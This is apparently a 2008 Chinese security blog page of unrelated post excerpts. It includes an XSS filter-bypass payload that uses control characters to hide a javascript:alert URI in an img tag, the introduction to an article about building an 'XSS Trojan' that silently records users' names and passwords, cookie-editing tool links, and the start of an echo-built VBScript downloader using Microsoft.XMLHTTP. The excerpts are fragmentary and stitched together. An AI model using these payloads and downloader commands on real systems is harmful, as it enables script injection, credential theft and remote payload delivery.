古木系统安全 原创，转载请保留此处： http://gzkb.goomoo.cn

2008/9/25 ———————————————–
...

 来自100年后的一封Email，网易不知道什么时候出现的Bug，自己YY下......

1、可以插入回车、包括段末结尾符和换行符的两种、即char（10）和char（13）、tab空格

<img src="&#25;jav&#13;as&#10;cript:al&#13;ert('test');">

...

下了个IIS5.1的安装文件，装好后start时，报错：0x8ffe 2740 

google了后，发现是因为迅雷默认的占用了80端口，闷· 

1、Firefox Cookie编辑器http://addneditcookies.mozdev.org/installation.htmlFireFox Cookie 编辑器，是FireFox的一个扩展。xpi.rar 在这个压缩包里，包含了这个插件的XPI，另外写了个简单的安装的批处理，只需要点下install.bat就OK。 2.IECookiesView ie

发表于《黑客防线》07年02期
作者：梦之光芒（Monyer）

在黑防给大家介绍Ajax Hacking技术也有几期了，但是还没有实践过。这次给大家带来的就是一次实战的分析问题和解决问题的过程，而且是一个通用的打造“XSS Trojan”的全过程。由于也是藏在后台获取和发送用户信息，和木马极为相似，所以文章的名字才叫XSS Trojan，和网页木马是两码事哦。本来是准备给大家介绍怎样做XSS Worm的，可是因为起稿时是以Sohu博客做实战的，在数据提交时出现了问题；所以这里仅会简单介绍一下它的思路，而在此之上我们会一起去做这个记录用户名密码的“木马脚本”（某些网站甚至可以不用脚本哦！）。
...

 
1.文件下载(无回显)
echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe
echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe
...